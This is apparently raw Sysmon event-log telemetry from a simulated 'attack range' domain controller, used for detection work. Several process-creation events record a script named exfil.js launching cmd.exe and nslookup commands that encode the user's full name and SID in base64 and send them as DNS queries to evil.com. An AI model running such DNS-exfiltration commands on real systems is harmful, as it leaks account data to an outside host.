|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215696Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.421{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-5F46-000000005F02}5944C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215695Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.421{2E1864BB-18FF-629A-5D46-000000005F02}40522032C:\Windows\system32\cmd.exe{2E1864BB-18FF-629A-5F46-000000005F02}5944C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215694Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.431{2E1864BB-18FF-629A-5F46-000000005F02}5944C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FF-629A-5D46-000000005F02}4052C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllqzz.tmp 2>&1 10341000x8000000000000000215693Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.405{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18FF-629A-5E46-000000005F02}5364C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215692Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.405{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FF-629A-5E46-000000005F02}5364C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215691Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.405{2E1864BB-18FF-629A-5E46-000000005F02}53645272C:\Windows\system32\conhost.exe{2E1864BB-18FF-629A-5D46-000000005F02}4052C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215690Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.400{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-5E46-000000005F02}5364C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215689Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.384{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215688Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.384{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215687Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.384{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215686Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.384{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215685Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.384{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-5D46-000000005F02}4052C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215684Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.384{2E1864BB-18E0-629A-6742-000000005F02}39761096C:\Windows\System32\WScript.exe{2E1864BB-18FF-629A-5D46-000000005F02}4052C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215683Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.393{2E1864BB-18FF-629A-5D46-000000005F02}4052C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllqzz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000215682Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.384{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlqinzb.tmpMD5=FB87DC05AA42B3CEFD4C629E53F524B0,SHA256=D8FD32DBA2A6AFDF9B6B8FFC9EECC534FF5A98DB8AFE74AF80C8BC0F2B8F0CBD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215681Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.352{2E1864BB-18FF-629A-5B46-000000005F02}73281908C:\Windows\system32\conhost.exe{2E1864BB-18FF-629A-5C46-000000005F02}3656C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215680Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.352{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215679Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.352{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215678Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.352{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215677Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.352{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215676Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.352{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-5C46-000000005F02}3656C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215675Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.352{2E1864BB-18FF-629A-5A46-000000005F02}72888008C:\Windows\system32\cmd.exe{2E1864BB-18FF-629A-5C46-000000005F02}3656C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215674Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.355{2E1864BB-18FF-629A-5C46-000000005F02}3656C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FF-629A-5A46-000000005F02}7288C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqinzb.tmp 2>&1 10341000x8000000000000000215673Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.321{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18FF-629A-5B46-000000005F02}7328C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215672Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.321{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FF-629A-5B46-000000005F02}7328C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215671Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.305{2E1864BB-18FF-629A-5B46-000000005F02}73281908C:\Windows\system32\conhost.exe{2E1864BB-18FF-629A-5A46-000000005F02}7288C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215670Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.305{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-5B46-000000005F02}7328C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215669Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.303{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215668Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.302{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-5A46-000000005F02}7288C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215667Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.302{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215666Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.302{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215665Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.302{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215664Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 